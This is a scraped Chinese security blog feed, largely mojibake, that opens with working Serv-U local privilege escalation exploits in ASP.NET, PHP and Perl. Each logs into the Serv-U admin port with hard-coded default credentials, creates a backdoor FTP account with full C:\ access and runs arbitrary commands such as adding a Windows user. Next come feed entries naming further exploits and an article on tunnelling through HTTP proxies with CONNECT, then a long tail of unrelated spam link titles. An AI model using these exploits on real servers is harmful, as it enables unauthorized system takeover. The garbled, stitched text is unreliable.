tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command銆:
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="鎻愪氦">銆銆
<input type="reset" name="Submit" value="閲嶇疆">
</form>
</body>
</html>


Perl
Perl鐨勯粯璁ゅ畨瑁呰礬寰勬槸錛欳:\Perl
鐒跺悗浣跨敤錛?br>perl 浣犵殑pl鏂囦歡鐨勮礬寰勩?br>鍦╓EBSHELL涓殑璺緞鏄繖鏍風(fēng)殑錛?br>C:\perl\bin\perl 浣犵殑pl鏂囦歡鐨勮礬寰?
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


鍙跺瓙 2007-08-04 15:17 鍙戣〃璇勮
]]>Symantec 鏍稿績(jī)椹卞姩 symtdi.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/07/20/28428.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:15:00 GMThttp://m.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://m.shnenglu.com/elva/comments/28428.htmlhttp://m.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://m.shnenglu.com/elva/services/trackbacks/28428.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:15 鍙戣〃璇勮
]]>Rav 鏍稿績(jī)椹卞姩 memscan.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/07/20/28427.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:14:00 GMThttp://m.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://m.shnenglu.com/elva/comments/28427.htmlhttp://m.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://m.shnenglu.com/elva/services/trackbacks/28427.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:14 鍙戣〃璇勮
]]>Linux Kernel do_mremap VMA鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/06/01/25237.html鍙跺瓙鍙跺瓙Thu, 31 May 2007 19:10:00 GMThttp://m.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://m.shnenglu.com/elva/comments/25237.htmlhttp://m.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://m.shnenglu.com/elva/services/trackbacks/25237.html闃呰鍏ㄦ枃

鍙跺瓙 2007-06-01 03:10 鍙戣〃璇勮
]]>Kaspersky Anti-Virus 榪滅▼鍒犻櫎浠繪剰鏂囦歡婕忔礊鍒嗘瀽鍙?qiáng)鍒╃敤浠g?/title><link>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Thu, 31 May 2007 12:44:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/25224.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/25224.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/25224.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://m.shnenglu.com/elva/archive/2007/05/31/25224.html'>闃呰鍏ㄦ枃</a><img src ="http://m.shnenglu.com/elva/aggbug/25224.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-31 20:44 <a href="http://m.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍛戒護(hù)鎵瑰鐞嗗疄鐜板3389鐧誨綍鐨勬棩蹇楄褰?http://m.shnenglu.com/elva/archive/2007/05/24/24732.html鍙跺瓙鍙跺瓙Wed, 23 May 2007 17:50:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/24/24732.htmlhttp://m.shnenglu.com/elva/comments/24732.htmlhttp://m.shnenglu.com/elva/archive/2007/05/24/24732.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24732.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24732.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-24 01:50 鍙戣〃璇勮
]]>鍒ゆ柇褰撳墠鐢ㄦ埛鏄惁涓虹郴緇熺鐞嗗憳http://m.shnenglu.com/elva/archive/2007/05/14/24080.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:56:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24080.htmlhttp://m.shnenglu.com/elva/comments/24080.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24080.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24080.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24080.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:56 鍙戣〃璇勮
]]>2000涓嬪彲鎵ц鏂囦歡淇敼鑷韓http://m.shnenglu.com/elva/archive/2007/05/14/24079.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:55:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24079.htmlhttp://m.shnenglu.com/elva/comments/24079.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24079.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24079.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24079.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:55 鍙戣〃璇勮
]]>絎竴涓敮鎸?000鍜?003涓嬪畬緹庤繘琛岀敤鎴峰厠闅嗙殑C婧愮爜(鍙湪webshell閲岀洿鎺ヨ繍琛?http://m.shnenglu.com/elva/archive/2007/05/14/24078.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:49:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24078.htmlhttp://m.shnenglu.com/elva/comments/24078.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24078.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24078.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24078.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:49 鍙戣〃璇勮
]]>MS Windows GDI Local Privilege Escalation Exploit (MS07-017) http://m.shnenglu.com/elva/archive/2007/05/08/23634.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:49:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/08/23634.htmlhttp://m.shnenglu.com/elva/comments/23634.htmlhttp://m.shnenglu.com/elva/archive/2007/05/08/23634.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23634.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23634.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:49 鍙戣〃璇勮
]]>甯﹁緇嗚В閲婄殑鍐插嚮娉㈠師浠g爜http://m.shnenglu.com/elva/archive/2007/05/08/23633.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:43:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/08/23633.htmlhttp://m.shnenglu.com/elva/comments/23633.htmlhttp://m.shnenglu.com/elva/archive/2007/05/08/23633.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23633.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23633.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:43 鍙戣〃璇勮
]]>HTTP Tunnelinghttp://m.shnenglu.com/elva/archive/2007/05/06/23526.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:51:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/06/23526.htmlhttp://m.shnenglu.com/elva/comments/23526.htmlhttp://m.shnenglu.com/elva/archive/2007/05/06/23526.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23526.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23526.htmlIntroduction

HTTP Tunneling

HTTP is a text-based protocol to retrieve Web pages through a Web browser. Mostly, if you are on a LAN connection, you are behind a proxy server; this proxy server has one HTTP proxy running on some defined port. In your Internet Explorer's Connection option, you specify LAN settings as required. This proxy server is definitely running on a text-based protocol, and you can only get HTTP-related data from the outside network, right!! Well, there is a small loophole from which you can go through HTTP and connect to the outside world and get any data you want in binary protocol, or even your own protocol. It's through HTTPS.

HTTPS Explanation

In HTTPS, data is transferred from browser to server and server to browser in a secure manner. It's a binary protocol; when it goes through a proxy, the proxy doesn't understand anything. The proxy just allows a binary stream to open and lets both server and client exchange the data. Now, we can fool the proxy server and connect to any server and exchange data. The proxy server will think that we are doing some secure HTTP session.

For HTTPS, your browser connects to a proxy server and sends a command:

CONNECT neurospeech.com:443 HTTP/1.0 <CR><LF>
HOST neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF> if required]>
<CR><LF>    // Last Empty Line

Then, the proxy server treats this as some HTTP Secure Session, and opens a binary stream to the required server and port as defined. If a connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established<CR><LF>
[.... other HTTP header lines ending with <CR><LF>..
ignore all of them]
<CR><LF>    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

  1. Connect to Proxy Server first.
  2. Issue CONNECT Host:Port HTTP/1.1<CR><LF>.
  3. Issue <CR><LF>.
  4. Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful.
  5. Read further lines of response until you receive an empty line.
  6. Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

Collapse
  // You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// a Line of response from socket until CRLF
try
{
CString Request,Response;
CSocketClient Client;
Client.ConnectTo("192.0.1.1",4480);
// Issue CONNECT Command
Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
Client<<Request;
// Issue empty line
Request = "";
Client<<Request;
// Receive Response From Server
Client>>Response;
// Ignore HTTP Version
int n = Response.Find(' ');
Response = Response.Mid(n+1);
// Http Response Must be 200 only
if(Response.Left(3)!="200")
{
// Connection refused from HTTP Proxy Server
AfxMessageBox(Response);
}
// Read Response Lines until you receive an empty line.
do
{
Client>>Response;
if (Response.IsEmpty())
break;
}while (true);
// Coooooooool.... Now connected to mail.yahoo.com:25
// Do further SMTP Protocol here..
}
catch (CSocketException * pE)
{
pE->ReportError();
}

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

Socket functions as a wrapper class. (CSocket is very heavy and unreliable if you don't have the exact idea of how it works.) All the functions are of the same name as CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

Collapse
  // e.g. You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// Line of response from socket until CRLF
try
{
CHttpProxySocketClient Client;
Client.SetProxySettings("192.0.1.1",1979);
// Connect to server mail.yahoo.com on port 25
Client.ConnectTo("mail.yahoo.com",25);
// You now have access to mail.yahoo.com on port 25
// If you do not call SetProxySettings, then
// you are connected to mail.yahoo.com directly if
// you have direct access, so always use
// CHttpProxySocketClient and no need to do any
// extra coding.
}
catch(CSocketException * pE) {
pE->ReportError();
}

Note: I usually don't program in the form of .h and .cpp different files, because using them the next time somewhere else is a big problem because you must move both files here and there. So, I put all the code in my .h file only; I don't write to the .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and so forth code of your Visual Studio-generated file. If you put anything above this, you will get n number of errors.

 



鍙跺瓙 2007-05-06 16:51 鍙戣〃璇勮
]]>榪滅▼妗岄潰瀹夊叏鍏ㄨВ錛堜笅錛?/title><link>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Sun, 06 May 2007 08:36:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/23524.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/23524.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/23524.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://m.shnenglu.com/elva/archive/2007/05/06/23524.html'>闃呰鍏ㄦ枃</a><img src ="http://m.shnenglu.com/elva/aggbug/23524.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-06 16:36 <a href="http://m.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>榪滅▼妗岄潰瀹夊叏鍏ㄨВ(涓?http://m.shnenglu.com/elva/archive/2007/05/06/23523.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:35:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/06/23523.htmlhttp://m.shnenglu.com/elva/comments/23523.htmlhttp://m.shnenglu.com/elva/archive/2007/05/06/23523.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23523.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23523.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-06 16:35 鍙戣〃璇勮
]]> 青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            
亚洲最新在线|
亚洲黄色天堂|
在线观看视频日韩|
国产精品毛片大码女人|
欧美福利电影在线观看|
激情欧美一区二区|
国产精品亚洲欧美|
亚洲制服av|
亚洲一区日韩在线|
欧美一区二区三区免费看|
欧美一区二区三区在线|
欧美在线网址|
好吊一区二区三区|
国产午夜精品福利|
免费久久99精品国产自|
美女国内精品自产拍在线播放|
裸体一区二区|
欧美日本高清一区|
国产精品久久久久久一区二区三区|
国产精品女同互慰在线看|
国产精品夜夜夜一区二区三区尤|
国产日韩亚洲欧美|
亚洲人成在线播放|
亚洲一区二区三区中文字幕在线
|
午夜视频在线观看一区二区三区|
欧美视频一区二区|
久久久999精品|
米奇777在线欧美播放|
一区二区三区色|
美女网站在线免费欧美精品|
亚洲深夜福利在线|
狠狠色综合网|
国产精品v欧美精品v日本精品动漫|
欧美视频二区36p|
欧美国产日韩亚洲一区|
亚洲在线观看免费|
久热这里只精品99re8久|
欧美日韩国产色视频|
国产一区二区三区高清
|
欧美日韩亚洲一区三区|
午夜国产精品视频|
久久久久这里只有精品|
一区二区三区免费观看|
欧美在线视频在线播放完整版免费观看
|
亚洲一区二区三区精品动漫|
亚洲国产小视频在线观看|
男男成人高潮片免费网站|
9i看片成人免费高清|
久久天天综合|
欧美怡红院视频|
欧美一区二区免费|
欧美三日本三级三级在线播放|
在线观看免费视频综合|
国产精品区一区二区三区|
亚洲国产精品成人久久综合一区|
欧美一区国产二区|
一区二区三区www|
99精品视频网|
亚洲少妇最新在线视频|
欧美福利一区二区|
欧美激情视频网站|
亚洲国产中文字幕在线观看|
亚洲经典一区|
夜夜嗨av色一区二区不卡|
麻豆精品视频在线|
亚洲国产成人久久|
欧美成人精品h版在线观看|
久久九九热re6这里有精品|
国产裸体写真av一区二区|
亚洲欧美在线另类|
久久亚洲一区二区三区四区|
99在线精品免费视频九九视|
欧美日韩视频在线第一区|
亚洲人人精品|
一区二区久久久久|
亚洲欧洲一区二区在线观看|
欧美成人一品|
国产精品黄色在线观看|
国产精品免费视频观看|
国产欧美一区二区三区在线老狼|
夜夜嗨一区二区|
欧美在线视频全部完|
亚洲欧美日韩国产中文|
国产日韩视频|
乱人伦精品视频在线观看|
免费欧美在线|
国产精品乱码久久久久久|
亚洲欧美视频|
欧美激情在线播放|
在线视频精品|
国产一区二区三区黄|
久久国产加勒比精品无码|
亚洲私人黄色宅男|
久久人人爽人人爽爽久久|
亚洲黄色在线看|
午夜精品福利电影|
欧美精品一区二区在线观看|
在线亚洲自拍|
亚洲春色另类小说|
欧美日韩福利视频|
亚洲风情在线资源站|
亚洲国产精品热久久|
欧美午夜久久|
另类av一区二区|
欧美成人一品|
欧美精品一线|
国产一区二区三区四区在线观看|
亚洲精品在线三区|
亚洲一区bb|
欧美午夜宅男影院|
久久久青草青青国产亚洲免观|
免费不卡在线视频|
欧美一区在线直播|
欧美福利在线|
毛片基地黄久久久久久天堂
|
国产综合第一页|
欧美亚洲在线播放|
久久综合给合久久狠狠色
|
亚洲小少妇裸体bbw|
亚洲国产清纯|
久久99在线观看|
亚洲欧洲av一区二区|
夜夜精品视频|
精品成人国产在线观看男人呻吟|
亚洲精品影院在线观看|
欧美国产日韩精品|
亚洲一区3d动漫同人无遮挡|
99www免费人成精品|
欧美激情精品久久久久久黑人|
欧美一区二区三区四区在线观看
|
国产精品入口|
亚洲女女女同性video|
另类综合日韩欧美亚洲|
亚洲黄色在线|
最新亚洲一区|
欧美日韩国产精品一区|
一区二区三区不卡视频在线观看
|
欧美激情中文字幕一区二区|
母乳一区在线观看|
蜜月aⅴ免费一区二区三区|
樱花yy私人影院亚洲|
亚洲主播在线观看|
国产亚洲aⅴaaaaaa毛片|
夜夜嗨av一区二区三区免费区|
91久久精品美女高潮|
久热精品视频|
亚洲激情电影在线|
久久综合狠狠综合久久综青草|
久久综合伊人77777麻豆|
国产欧美va欧美不卡在线|
午夜精品福利在线观看|
欧美日韩在线看|
99pao成人国产永久免费视频|
欧美久久精品午夜青青大伊人|
日韩视频在线播放|
另类专区欧美制服同性|
亚洲国产成人一区|
在线亚洲免费|
久久久久免费|
一区二区三区福利|
亚洲一区二区三区精品视频|
亚洲网站在线观看|
欧美一区二区三区的|
亚洲美女视频在线观看|
欧美国产日韩一区二区在线观看|
91久久亚洲|
午夜精品久久久久久久久久久久|
国产精品一区二区久久精品|
欧美一区二区三区在线看|
欧美电影打屁股sp|
亚洲欧美日韩精品久久久|
国产视频在线观看一区|
久久久久久久久久久一区|
中国成人亚色综合网站|
久久精品国产96久久久香蕉|
久久综合电影一区|
亚洲伦理网站|
国产一区二区三区日韩|
亚洲国产精品999|
亚洲精品免费看|
国产精品日韩|
久久国产福利|
性欧美在线看片a免费观看|
久久婷婷影院|
亚洲一区二区三区三|
国产日韩av在线播放|
麻豆freexxxx性91精品|
亚洲老板91色精品久久|
亚洲国产1区|
欧美日韩亚洲一区二|
午夜精品一区二区三区在线|
亚洲福利视频专区|
久久精品系列|
欧美电影资源|
欧美一区二区三区在线|
亚洲精品久久久久|
亚洲精品日韩久久|
国内精品久久久|
午夜久久99|
亚洲片国产一区一级在线观看|